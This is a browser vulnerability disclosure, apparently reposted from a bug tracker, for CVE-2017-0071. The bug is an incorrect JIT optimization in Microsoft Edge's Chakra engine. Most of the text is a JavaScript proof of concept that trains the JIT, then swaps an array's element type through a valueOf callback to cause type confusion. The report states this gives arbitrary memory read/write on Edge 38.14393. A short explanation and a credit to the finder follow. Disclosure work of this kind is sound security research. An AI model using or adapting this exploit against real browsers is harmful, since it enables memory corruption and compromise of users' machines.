Microsoft Edge Charkra Incorrect Jit Optimization

`Microsoft Edge: Chakra incorrect jit optimization with TypedArray setter.   
  
CVE-2017-0071  
  
  
PoC:  
  
"use strict";  
  
function func(a, b, c) {  
a[0] = 1.2;  
b[0] = c; <<<<----------------------- (1)  
a[1] = 2.2;  
a[0] = 2.3023e-320;  
}  
  
function main() {  
var a = [1.1, 2.2];  
var b = new Uint32Array(100);  
  
// force to optimize  
for (var i = 0; i < 0x10000; i++)  
func(a, b, i);  
  
func(a, b, {valueOf: () => {  
a[0] = {}; <<<<----------------------- (2)  
  
return 0;  
}});  
  
a[0].toString();  
}  
  
main();  
  
In the above code, Chakra assumes that the type of |a| will be still a native float array after executing (1), even we could change its type with the valueOf handler( (2) ). So it could result in type confusion.  
  
The attached PoC will reproduce arbitrary memory read/write.  
  
Tested on Microsoft Edge 38.14393.0.0.  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`